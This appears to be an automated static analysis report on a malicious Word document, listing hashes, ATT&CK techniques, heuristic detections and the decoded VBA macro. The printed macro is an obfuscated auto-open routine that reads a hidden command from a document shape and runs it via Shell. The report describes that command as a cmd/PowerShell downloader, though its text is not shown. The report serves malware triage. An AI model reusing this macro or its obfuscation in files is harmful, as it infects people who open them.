Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a09cc3bd6d10f106…

MALICIOUS

Office (OLE)

136.4 KB Created: 2018-12-06 21:33:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: 2a7366b4fa700fbddda0f452615ad5c7 SHA-1: 0df69a2934bfb775d1ff42e5683d5ab95afb7682 SHA-256: a09cc3bd6d10f106f7b37fc71033bc299ce768f3e7be5c0c542af192dfbf170b
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1059.003 Windows Command Shell

The sample contains a VBA macro with an autoopen subroutine that utilizes the Shell() function to execute a command. This command invokes cmd.exe with flags that suggest it is intended to download and execute a second-stage payload, likely leveraging PowerShell. The presence of multiple high and critical heuristic firings related to VBA macros and command execution supports this assessment.

Heuristics 10

  • ClamAV: Doc.Malware.Generic-6775361-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6775361-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    ZcXvMMQ = Array(UoJfIbG, qBmJPSClv, NhvPtKcku, Interaction _
.Shell(BnTbrPorW, cbdmS), wodqZ)
   NfniMoMrrTQWShSLwFPpj = 206942206 * CInt(273639464) + qSoMiusHPQosuOpN + CLng(74775348 + Sgn(rwjNBimJrjirBi) - 276144311 * 192448080) - tzzMzaJHBsaQiPBdcntdcQK + Chr(VDJZYPGCRVvOLruVXFz) * 251211342 / CStr(81305801) / (IThNYuwzPcpZruRkjmlXzMT / 258014778 / ltXGXRYNcuprLqLFR / Fix(SZlzAEmWNAoswzt + Hex(mBZssLQMPzcsXvaRiGBOjmt) + 128496983 + CBool(131059806 + EXYjwpwQEJjZNH)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
FqzGRYz
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8085 bytes
SHA-256: a52800506f0589541bcaca044c126195ba2569907216127a83503667c5eb9dfe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
194 of 226 identifiers look randomly generated (e.g. 'ERjthEzLNTsdLllkGGYzmJbM') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DUJlCSmWJRRcpj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
FqzGRYz
End Sub

Attribute VB_Name = "JPArptkiij"
Function FqzGRYz()
On Error Resume Next
   VsjwjBRLIiTauna = 109538257 * CInt(73409720) + LShaGHwDRFrkdwJvrWAk + CLng(68176563 + Sgn(cZphPAmwhIISAXZu) - 250903192 * 162377197) - fkMUYBXQzwDPbWwqHlZsvRSY + Chr(bKvlVwkckicPFRjrjmCds) * 222028586 / CStr(317860163) / (hRJMjDORolwqbi / 199165635 / TnqrVaBTtALfQuqtOuEDnXvj / Fix(LbUUpQFICKEqEfHQp + Hex(jrjAtuCcjaaMvrKbKw) + 216804195 + CBool(336690761 + jGWNklCJOwnzDP)))
   ZzPFjZMsYcFNjUPolLmkh = 289521341 * CInt(116025181) + YkinWzwwcPGcaAmiRCvhRStG + CLng(176576992 + Sgn(mczwDhiRjvuZWZdGlQ) - 86875892 * 256000315) - kZDTfwjjFrXMzNVA + Chr(MZuJTqnsfWDKhctnJBCt) * 193739860 / CStr(162215655) / (wlaDXMWLIGGEnsEQiPaza / 209307069 / YOiYpLTGCnpvXtmQjI / Fix(vEaYGvFkTdCZKSPB + Hex(tnhAozEQwzjXwzuqQjQwqY) + 196275245 + CBool(239135829 + AdzOfcIszXtbKHFWHHz)))
   YRRvRAubXkLhWrcJbwI = 154785417 * CInt(99696767) + jilZpiHEJRbasoPtibuwzo + CLng(70951262 + Sgn(WwbzMVvwJjinKrLLTTatGwzn) - 299837024 * 218278922) - hcTruTlDsHJsoWiRI + Chr(cjqPjcdORtaznEf) * 49876443 / CStr(90661888) / (qsoTYoSEJbmWbirhRz / 153840688 / tqNfCsdvTFMjJKbPS / Fix(KCwfSCcuRvFFnhk + Hex(azfIRjLXkEOFNQDbPImVUOYK) + 21398583 + CBool(47426128 + hpNSfwMkbkKqiqZuOoW)))
   iYDGUnGnbPEdlL = 71118488 * CInt(154977670) + XiaOqzYRjUIbJicC + CLng(72202266 + Sgn(EvkKznWNjwGtZIMDhFDl) - 290864879 * 167878163) - pkSwLRlcbafGcdMlnscQ + Chr(LqvzPGzWzZniQuZipKv) * 328946345 / CStr(146859297) / (TuCjZUUPtPJEduXwvLnF / 185104620 / sbLjmGwhhSDjXA / Fix(fjdBjjYVMRfGqPjKQCRBaYqh + Hex(RLhrAwXXBPfKEsVU) + 43089889 + CBool(333501911 + HAHSzIndFwXHpvnRU)))
   HbGvwBqLLqOkviwDrna = 177877219 * CInt(318085998) + ZqalwJHabYsqUYXjnzIGGci + CLng(160580244 + Sgn(lMNLtrvdOBPVNChDkPqr) - 31343105 * 94885843) - jKzdSqmzLBFNwtPhhz + Chr(GXHLavaCVMojbXoh) * 6067696 / CStr(303792897) / (cnbEETHokJViItsI / 2074213 / zZisoRlWUiqIMOnTVZi / Fix(DrTGpszifmjOoIBUfj + Hex(JShwcwczHupYSdhVHFbCvRGq) + 225013070 + CBool(312111956 + TEMSnlZVAVsqINvsjqO)))
Set HnuPEhDr = DUJlCSmWJRRcpj.Shapes(qQhWJt + "cVJaltSRfIbfQ" + cBmtIjzOP).TextFrame
   GhlwbQLrIOlcmDwLTKzofH = 44478772 * CInt(48550316) + VhWtzzhTttDHDqYiFtQ + CLng(71829657 + Sgn(pVTWDUtjGzadZG) - 232280261 * 271634699) - IREItKvEPUbJaNpwYjLDWvco + Chr(muddikopGlzGrvLYSozSWj) * 250942926 / CStr(241281638) / (AZXmbMoPVHPRaljmUTbqp / 220709388 / ziEHcVRFIswdKQDiYLqWo / Fix(GrDPjBMKurTpYHXFLuEBHZdH + Hex(VRpDfzLvDYMEMpPtzzF) + 69412376 + CBool(137872366 + vGSzwSnojNvqKjXGPsHuViL)))
BnTbrPorW = HnuPEhDr.ContainingRange + cVikf + oIKbY + HPrwIWif + iMCaXMvR + dfiFpwmi + WjpOmFrM + ZImTsLu + ImSfK + lmJKkwR
   nSIAnBnudhcSkSijfb = 312059348 * CInt(79558842) + FnmYAHAwjRUjlmosQUkl + CLng(118430744 + Sgn(KVuRLvTrqbMqhiVcmtnwtPIl) - 333898184 * 207234020) - oOGKaOJdQiiwEfsbtTvFJW + Chr(iqwVCuNITfGicjQmbYBEwD) * 325759007 / CStr(230540931) / (BoPSDafRaYUbsGiDV / 103479001 / wAPrcjThIRpitPEBG / Fix(qPFaMCLvLjRTBcohkQlwmlkt + Hex(AktaMoFbFfAKYnNjjV) + 236954844 + CBool(101753340 + QNqMioQKLEiMCMRSVzuMsw)))
   ujaZjFbTMdQurqiwQfpipin = 79361518 * CInt(118911744) + wToSwJwoEauiWdRJibiAzP + CLng(68588099 + Sgn(WXEcBPwOHsGIfufHzDmEBmJ) - 83250541 * 91403290) - zLdSqjIzwbETmoijXiWI + Chr(kwaCudGpkOrPVPkkpBXz) * 222680590 / CStr(329294829) / (CiQzZVPiqFCPOC / 103442031 / GCHLMNEQYtwhdzJwmsYYdfjU / Fix(kBJTAWhaFQwamrpZzZ + Hex(YhBrvFcVirSaVmqcLuzY) + 153819999 + CBool(98949455 + YiMWABjwdGAvnjK)))
   PGRvXbDWSYqBbCttLalQIAY = 99042485 * CInt(265098942) + VmnrOBwBwFEtfVQskRbJQsNt + CLng(121526615 + Sgn(jLlOhCGbFQiaJpD) - 170263983 * 21162893) - pRvPAPPHnifdZtZGRnQkYC + Chr(DQzJKHlGqpZEAMULWzZOcv) * 184441404 / CStr(287542728) / (BDXPJTPniszBFFzCXpozpY / 301437976 / ctkwnKIoHUIENqjWKRVUVKRu / Fix(MEGnszcJZnQiRzUjKtk + Hex(vojISpXCZcScqYaGBAPUjvnD) + 108662701 + CBool(260467284 + RBkKQjziYXwVCcakzVorsZO)))
   GTbFsmMGBfdujIpzVFwsWc = 333397624 * CInt(118478613) + mzCqQwBXhoZMOdEqmzAGFpCi + CLng(263926968 + Sgn(jmMPiVJFGoJPkjcWzU) - 110030718 * 241906942) - crBkcwLtwuTCuPO + Chr(RKDDIWQjWPRdjqiR) * 22020027 / CStr(96707017) / (uLfCXzLJtqMqTO / 75203134 / KMhzFbUNMjiKGMCzfLUAm / Fix(jFwNWqKYzPXIYFV + Hex(wSqSpqPADjnNKItKv) + 16191713 + CBool(209894889 + CsEdDnjTnzowdQMBJTS)))
   ERjthEzLNTsdLllkGGYzmJbM = 332337525 * CInt(258535062) + ZTzrqEEXSFsZdROsGB + CLng(130989866 + Sgn(wjndwhnKupXvuiXsO) - 184910535 * 12933259) - HOSiOhuiXRVKiYXtfVu + Chr(QtcdhzivuWdizuHk) * 92977555 / CStr(58568197) / (PmFmdTMQWLiNthsIN / 244562259 / wQCzoBorLjRmiWGiXLGzJV / Fix(IjPJkwHmtzYMwNnRkocBj + Hex(YzqmCVwHlfbjuPY) + 294290548 + CBool(26731515 + DzXnGKHRjuVKhUADKQSztmp)))
   MmThzsJYIjXlam = 15037227 * CInt(211063675) + WaoIHSwPKuZBkrWrNuAQa + CLng(101257947 + Sgn(qnHVituBzKVJEVtFTWR) - 265779604 * 332037042) - WXrAtMrBPIHzwUzwSWQtZ + Chr(PiSWTphuIbcFQkddzhJwvMB) * 33255408 / CStr(153612968) / (FWDvXFLfIJiXsBUUAjW / 294468687 / PToWijavDjNwuk / Fix(qNDXulbTvcoHiaMV + Hex(iUpDOZoWkkFdUYzRKimdz) + 333267567 + CBool(123788668 + ztutbwUqKiUauGboOBJBWq)))
   wwXfifQWKoJvPiwOOlSOdLO = 193803445 * CInt(267864101) + nHXhPMNiwBUGYUXuXqOwrIJH + CLng(63301301 + Sgn(LFPnkurhsIzcYzhj) - 250351994 * 307828682) - INwqjoXOqFfwQXFAHTJQZPq + Chr(OvuSRQKWOMBwNPjzNfA) * 181723456 / CStr(84996461) / (jETwZNciUsWWbntF / 320299618 / vIjDWImsmKDtOPPELpw / Fix(qwtkrJarnsFIjafEaf + Hex(LJhbSabdHGXcEGbjzPwMN) + 226450875 + CBool(309807012 + tFuKojLijHnLJVb)))
   CWCMmKwhnOdzqtpXUEirQCBm = 156323439 * CInt(257913304) + ElDImOrVZpjKITsq + CLng(163124215 + Sgn(wrWUSIzKKhAVQozw) - 287437268 * 316713173) - FrlwYQhluaXXLcbbvqjTv + Chr(cDJVDZuKKcwGSUK) * 294659705 / CStr(326780360) / (lXEknKospNDHHc / 266946374 / OipDMIrjPvbFJHQCtfiYErQz / Fix(LkjHDUTRWFcDurdfVUri + Hex(iiwAOcuQsXSpXAXKcMbHn) + 260489530 + CBool(13171059 + zwnFsjXYQwcBkGosZBiiKN)))
   kdViQpwSiuVkht = 66412499 * CInt(248434556) + iQnroARkkjZqAzSw + CLng(203154507 + Sgn(HnlNwidRdVibvqvJznlMwdEz) - 209422461 * 33281014) - civDlCwCzaRUJNXXvFJ + Chr(iurCiMSBijohrGBjhRsZzo) * 328934852 / CStr(229395678) / (TcwYGIrWQphrtZZjvXOm / 233396532 / CMnpiMjptwIVKkUcXbwK / Fix(RUrosTpDQjwwqamlQii + Hex(avkiXPpPSzmpYCkrvAlttl) + 187702701 + CBool(85929667 + ZTJhrGzRXzVkJRdi)))
Const cbdmS = 0
   GJTGVlIXkwTSQt = 179254581 * CInt(191509986) + qkkvBnrILrwztQzfAwovr + CLng(132892356 + Sgn(JkjsjTMiqpMzoIGEVbwJ) - 302681969 * 73458971) - qiTnPzmhrWEaKSvHozN + Chr(KhSLXtrTTtKlwMs) * 68614668 / CStr(105967978) / (whDIUbjhwmaTJKjEOJPI / 105497007 / FTNwMSbzZkrIDjCBMr / Fix(pzFsAkzFtwjvHQabkuW + Hex(QFwMpcAHABMwXhaYA) + 177035138 + CBool(87877497 + MNhwqpksdESHqcKj)))
   ZHLzVCjbOJIhjcDwcTlsi = 235891257 * CInt(309233464) + nTihFCSafYVPfZmVICEzh + CLng(200972179 + Sgn(pHEwJXhDpMdMCUzVMr) - 223672841 * 16735564) - HnSDhPjbfvBIvsa + Chr(EIDzVfDCMjBJhs) * 53660987 / CStr(336206679) / (QhTlucHwbKQcDHbZTIi / 201638899 / lbkQqzOaunnCjfL / Fix(QJfvzuVnZIcZkOj + Hex(UWiGjUDitYjWcaWcQSC) + 334190037 + CBool(19184687 + FqGwqiVopjDOhJAEXwFAC)))
   jrzsNfvGYYwXErUEm = 70269422 * CInt(288670758) + mZoaKfBWwUPGJo + CLng(63337112 + Sgn(jmPcqkXwjAQaXrGB) - 87536369 * 241852254) - JDXhidZKEJrNQiKVzuPJ + Chr(CrtKOazFNNtZIz) * 47280254 / CStr(79696250) / (hwRaSnonArMVGH / 330484829 / dHLdXTDZErwwoHiCJvN / Fix(sbjEEXNjnjGGuwisv + Hex(jOvsVbqqzsJKMKthiCXGY) + 5166978 + CBool(37126670 + lVkpDpcqHaPwUAGINO)))
ZcXvMMQ = Array(UoJfIbG, qBmJPSClv, NhvPtKcku, Interaction _
.Shell(BnTbrPorW, cbdmS), wodqZ)
   NfniMoMrrTQWShSLwFPpj = 206942206 * CInt(273639464) + qSoMiusHPQosuOpN + CLng(74775348 + Sgn(rwjNBimJrjirBi) - 276144311 * 192448080) - tzzMzaJHBsaQiPBdcntdcQK + Chr(VDJZYPGCRVvOLruVXFz) * 251211342 / CStr(81305801) / (IThNYuwzPcpZruRkjmlXzMT / 258014778 / ltXGXRYNcuprLqLFR / Fix(SZlzAEmWNAoswzt + Hex(mBZssLQMPzcsXvaRiGBOjmt) + 128496983 + CBool(131059806 + EXYjwpwQEJjZNH)))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.